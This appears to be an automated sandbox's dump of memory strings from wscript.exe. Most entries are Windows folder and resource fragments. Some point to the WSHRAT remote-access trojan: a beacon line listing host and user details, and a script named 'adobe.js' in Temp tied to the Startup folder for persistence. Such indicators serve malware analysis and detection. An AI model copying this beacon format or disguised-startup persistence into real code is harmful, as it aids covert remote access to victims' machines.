Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: iconindex-173
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: (<pdx
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21798
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: iconresource%systemroot%\system32\imageres.dll,-184
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: desktop@
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .desktop
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @ @!@"@#@$@%@&@'@(@)@*@+@,@-@.@/@0@1@2@3@4@5@6@7@8@9@:@;@<@=@>@?@@@a@b@c@d@e@f@g@h@t
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 303h3d3
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 34,4p4t4
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 5(5p5x5
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 6,6p6p6
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 7,7p7t7
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 8l8|8
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 9<9`9
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: :0:t:|:
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ;<;x;t;
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ;< <<<d<c
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: music
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: music<
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .music
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: `m>@p'
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: wv8 p
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21769
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: iconresource%systemroot%\system32\imageres.dll,-183
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: videos
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: videos>
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .videos
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-12688
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\downloads\desktop.ini
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-21770
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %systemroot%\system32\imageres.dll,-1040
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %systemroot%\system32\imageres.dll,-115
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ::{59031a47-3f72-44a7-89c5-5595fe6b30ee}
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: (wf(wf@j
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-21779\
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %systemroot%\system32\imageres.dll,-108v
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-12690p
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %systemroot%\system32\imageres.dll,-189j
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-21787d
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-21786~
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %systemroot%\system32\imageres.dll,-117x
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-21790r
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-12689l
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-21796f
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-21798`
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\favorites\desktop.ini9d}
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-21787
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-21782
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-21791
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %systemroot%\system32\imageres.dll,-113<
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\windows.storage.dlll6
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %systemroot%\system32\imageres.dll,-1840
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %systemroot%\system32\imageres.dll,-112*
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-21797$
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\windows.storage.dlll
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-21769
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ::{20d04fe0-3aea-1069-a2d8-08002b30309d}
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\programdata\microsoft\desktop.ini
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %systemroot%\system32\imageres.dll,-112
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\fonts\desktop.ini
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %systemroot%\system32\imageres.dll,-183
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\documents\desktop.ini
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: /c:\`1
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: progra~3
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: progra~3h
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: zit.g
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: programdata
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: micros~1
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: micros~1d
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: zpt.h
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: windows
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: windows@
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: startm~1
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: startm~1n
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: start menu@shell32.dll,-21786
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21770
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: iconresource%systemroot%\system32\imageres.dll,-112
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: iconindex-235
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: wshrat|b81a4609|user-pc|user|microsoft windows 10 pro|plus|windows defender .|false - 15/4/2025|javascript
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: /c:\v1gzct
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: zlt.3
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: fonts
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: fonts<
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: lfonts
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \rr:\users\user\appdata\local\temp\adobe.jsindows\start menu\programs\startuptop.inih
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 693405117-2476756634-100
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21786
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shell:::{20d04fe0-3aea-1069-a2d8-08002b30309d}\::{088e3905-0323-4b02-9826-5d99428e115f}(
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shell:::{20d04fe0-3aea-1069-a2d8-08002b30309d}\::{a8cdff1c-4878-43be-b5fd-f8091c1c60d0}
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shell:::{20d04fe0-3aea-1069-a2d8-08002b30309d}\::{24ad3ad4-a569-4530-98e1-ab02f9417aa8}
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell:::{20d04fe0-3aea-1069-a2d8-08002b30309d}\::{3dfdf296-dbec-4fb4-81d1-6a3438bcf4de}tmemstr_3ddc8eac-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21787memstr_752a1871-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bc:\users\user\appdata\local\temprosoft\windows\start menu\programs\startupmemstr_2988ce7b-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell:::{20d04fe0-3aea-1069-a2d8-08002b30309d}\::{f86fa3ab-70d2-4fc7-9c99-fcbf05467f3a}memstr_4b6b0b1f-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: documentsmemstr_fb5d381b-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: documentsdmemstr_9ce71190-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .documentsmemstr_0fb05c83-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21779memstr_90fa509e-e
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: infotip@%systemroot%\system32\shell32.dll,-12688memstr_2305e772-4
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconresource%systemroot%\system32\imageres.dll,-113memstr_9cab8740-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconindex-236memstr_163f284a-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startupmemstr_5c0fb67c-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: favoritesmemstr_fbd694bb-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: programsmemstr_ff7a79ab-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: onedrivememstr_a655b54f-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: printhood=memstr_314fa740-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: documents;memstr_aac83bf5-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \lder5memstr_046fff16-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,xrs1memstr_f9509005-e
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: folder/memstr_3e7d3458-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,xfolder-memstr_48032729-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: downloads+memstr_41001e31-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fonts)memstr_e6784564-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \lder'memstr_b7d38d33-c
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pictures#memstr_64aea4a8-8
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: folder!memstr_f78e87a5-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: templatesmemstr_eca07533-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startupmemstr_66c1804b-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,xfoldermemstr_4a627817-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: personalmemstr_760a0706-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: jsoldermemstr_a7dc87cc-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sendtomemstr_5ecfef9b-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: start menumemstr_1ec926d7-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nethoodmemstr_d7ee5a05-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: foldermemstr_2b19a881-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: recentmemstr_a679896d-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: picturesmemstr_4e97b279-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: picturesbmemstr_23ed45b2-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .picturesmemstr_fd29badd-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21791memstr_e3de57c9-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: infotip@%systemroot%\system32\shell32.dll,-12690memstr_6b1a2449-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconresource%systemroot%\system32\imageres.dll,-189memstr_684d3ff6-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconindex-238memstr_3fe97e9e-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mycomputerfolderhmemstr_7b3fb7b5-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: common programsgmemstr_c295070d-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local downloadsbmemstr_778fd297-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local videosmemstr_b2915066-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local picturesmemstr_17c25866-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\fontsmemstr_a77e0e13-0
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell file system folderamemstr_57b50736-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell file system foldermemstr_b69a88cf-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user1796memstr_a6f0ca26-c
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !("h"memstr_2a700622-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c\users\usertamemstr_fcb5a9ac-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (!d!memstr_01a76017-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\onedrivememstr_c823c025-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\recentmemstr_74704a52-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\templatesmemstr_a072ad40-e
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sersesmemstr_cbee1684-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c\users\usernsmemstr_d6779ca1-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\sendtomemstr_d0d16c9b-4
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e,ede\ememstr_c0f50dea-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e f8b\f?memstr_95e3c647-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]/qnnmemstr_e5c4236b-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: downloadsmemstr_1f3502ec-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: downloadsdmemstr_4a399530-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .downloadsmemstr_93a47152-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: onedrivebmemstr_a034add8-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .onedrivememstr_8cd86cd7-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "false - 15/4/2025tringsop.inimemstr_b9b94f84-d
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: swbemsecuritysetest2memstr_e06c501d-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %@%p%memstr_284403c9-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\videos\desktop.inilmemstr_de698e37-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\printer shortcutsbmemstr_974858f8-3
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\onedrive\desktop.inikmemstr_a2d9cba3-f
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: }d"pnmemstr_ebafa85d-7
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\downloads9memstr_41142759-6
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming2memstr_98548ce4-9
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\network shortcuts%memstr_568a3e4f-e
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tc:\users\user\appdata\local\temp\adobe.jssjmemstr_6a52b05a-c
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tc:\users\user\appdata\local\temp\adobe.jsnmemstr_8583668c-b
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tc:\users\user\appdata\local\temp\adobe.jsimemstr_d1e6af91-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\windows.storage.dll,-21770memstr_e28e12dd-2
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (non)standard marshaling for iwbemobjectsink2memstr_c38d7b9d-c
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconresourcememstr_e9d8cf98-5
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\program files (x86)\microsoft onedrive\onedrive.exe,1memstr_786663cb-1
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconresourcec:\program files (x86)\microsoft onedrive\onedrive.exe,1memstr_b957b7c2-a
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s-tc:\users\user\appdata\local\temp\adobe.jsmemstr_6e260bd3-e
                            Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\favorites\desktop.inimemstr_a0b69442-9
